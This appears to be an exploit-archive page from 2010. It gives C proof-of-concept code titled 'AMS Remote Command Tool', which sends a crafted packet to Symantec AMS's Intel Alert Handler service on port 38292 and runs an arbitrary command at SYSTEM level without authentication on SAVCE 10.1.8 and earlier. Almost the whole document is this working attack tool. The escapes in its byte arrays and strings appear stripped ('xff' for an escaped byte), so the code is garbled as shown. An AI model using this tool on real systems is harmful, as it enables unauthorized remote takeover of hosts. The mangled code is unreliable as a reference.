Symantec AMS Intel Alert Handler Service Design Flaw

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Symantec AMS Intel Alert Handler Service Design Flaw
# Published : 2010-07-28
# Author : Spider
# Previous Title : Microsoft Visual Studio 6.0 (VCMUTL.dll) 0day Unicode ActiveX Buffer Overflow
# Next Title : UPlusFTP Server v1.7.1.01 [ HTTP ] Remote Buffer Overflow [ Post Auth ]
// Remote command execution at System level without authentication
// Advisory:https://www.foofus.net/?page_id=149
// Exploit Title: Symantec AMS Intel Alert Handler service Design Flaw
// Date: 07/28/10
// Author: Spider
// Software Link: http://www.foofus.net/~spider/code/ams-cmd.cpp.txt
// Tested on: Symantec SAVCE 10.1.8 and earlier with AMS installed 

// POC code to execute commands on system vulnerable to AMS2
// design flaw of Intel Alert Handler service (hndlrsvc.exe)
// within Symantec SAVCE 10.1.8 and earlier
// ***Created by Spider July 2009***
//--------------------Foofus.net-------------------------

#include <stdio.h>
#include <dos.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>

unsigned char payload[1000];
unsigned char inject1[] =
"xffxffxffxffxffxffxffxffx00x00"
"x02x00x95x94xc0xa8x02x64x00x00x00x00x00x00x00x00"
"xe8x03x00x00x50x52x47x58x43x4ex46x47x10x00x00x00"
"x00x00x00x00x04x41x4cx48x44x5cx46x00x00x01x00x00"
"x00x01x00x0ex00x52x69x73x6bx20x52x65x70x61x69x72"
"x65x64x00x25x00x53x79x6dx61x6ex74x65x63x20x41x6e"
"x74x69x56x69x72x75x73x20x43x6fx72x70x6fx72x61x74"
"x65x20x45x64x69x74x69x6fx6ex00xf9x1dx13x4ax3fx0c"
"x00x4cx41x42x53x59x53x54x45x4dx2dx31x00x08x08x0a"
"x00x52x69x73x6bx20x4ex61x6dx65x00x07x00x05x00x54"
"x65x73x74x00x08x0ax00x46x69x6cx65x20x50x61x74x68"
"x00x07x00x05x00x54x65x73x74x00x08x11x00x52x65x71"
"x75x65x73x74x65x64x20x41x63x74x69x6fx6ex00x07x00"
"x05x00x54x65x73x74x00x08x0ex00x41x63x74x75x61x6c"
"x20x41x63x74x69x6fx6ex00x07x00x05x00x54x65x73x74"
"x00x08x07x00x4cx6fx67x67x65x72x00x07x00x05x00x54"
"x65x73x74x00x08x05x00x55x73x65x72x00x07x00x05x00"
"x54x65x73x74x00x08x09x00x48x6fx73x74x6ex61x6dx65"
"x00x0ex00x0cx00x4cx41x42x53x59x53x54x45x4dx2dx31"
"x00x08x13x00x43x6fx72x72x65x63x74x69x76x65x20x41"
"x63x74x69x6fx6ex73x00x07x00x05x00x54x65x73x74x00"
"x00x07x08x12x00x43x6fx6ex66x69x67x75x72x61x74x69"
"x6fx6ex4ex61x6dx65x00x22x00x20";

unsigned char cmdother[] =
"x00x08x0cx00x43x6fx6dx6dx61x6ex64x4cx69x6ex65";

unsigned char inject2[] =
"x00x08x08x00x52x75x6ex41x72x67x73x00x04x00x02x00"
"x20x00x03x05x00x4dx6fx64x65x00x04x00x02x00x00x00"
"x0ax0dx00x46x6fx72x6dx61x74x53x74x72x69x6ex67x00"
"x02x00x00x00x08x12x00x43x6fx6ex66x69x67x75x72x61"
"x74x69x6fx6ex4ex61x6dx65x00x02x00x00x00x08x0cx00"
"x48x61x6ex64x6cx65x72x48x6fx73x74x00x0bx00x09x00"
"x44x45x41x44x42x45x45x46x00x00x00x00x00";

void banner (char *proga)
	{
	system("cls");
	printf("nUse: %s <ip>  <command>n", proga);
	}

int main ( int argc, char *argv[] )
{
SOCKET sock;
WSADATA wsa;
struct sockaddr_in addr;

printf("    __        ___      __   __                __    n");
printf(" | /  \ |    /  _/___ |__| _\ |___  _ __   | /  \ | n");
printf("\_\\  //_/   \_  \ . \|  |/ . / ._\| `_/  \_\\  //_/n");
printf(" .'/()\'.    /___/  _/|__|\___\___\|_|     .'/()\'. n");
printf(" \ \  / /        |_\                       \ \  / / n");
printf("              AMS Remote Command Tooln");

	int port;
	if ( argc < 3 ) 
		{ 
			banner(argv[0]);
			exit(0); 
		}

char *ip_addr = argv[1];
int length = (int)strlen(argv[2]);

if (length > 128)
		{
		    printf("n WARNING WARNING WARNING %s n");
		    printf("n Input Command String Greater than 128 Characters is not Permited %s n");
		    exit (0);
		}

// building injection packet  

	inject1[353] = length+3;
	inject1[355] = length+1;
	memcpy(payload,inject1,356);

	int a = 356;
 	for (int i = 0; i<(length); i++)
	  	{
    			a=a+1;payload[a] = argv[2][i];    
          	}

	int b = a;
	for (int i = 0; i<=14; i++)
  		{
    	 		b=b+1;payload[b] = cmdother[i];    
		}

	int c = b;
	payload[c+2] = length+3;
	payload[c+4] = length+1;

	int d = c+5;
	for (int i = 0; i<length; i++)
  		{
    			d=d+1;payload[d] = argv[2][i];    
          	}

	int e = d;
	for (int i = 0; i<=109; i++)
  		{
    	 		e=e+1;payload[e] = inject2[i];    
		}

// setting up socket and sending packet

	printf("[] preparing....n");

 		WSAStartup(MAKEWORD(2,0), &wsa);
		sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
		addr.sin_family = AF_INET;
		addr.sin_port = htons(38292);
		addr.sin_addr.s_addr = inet_addr(ip_addr);

	printf("[] connecting..n");
		if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1 )
			{ printf("[-] connection failed!n"); exit(0); }

	printf("[] sending crafted packet 1 ...n");
		if ( send(sock, payload, sizeof(payload), 0) == -1 )
			{ printf("[-] send failed!n"); exit(0); }

closesocket(sock);
WSACleanup();

return 0;

}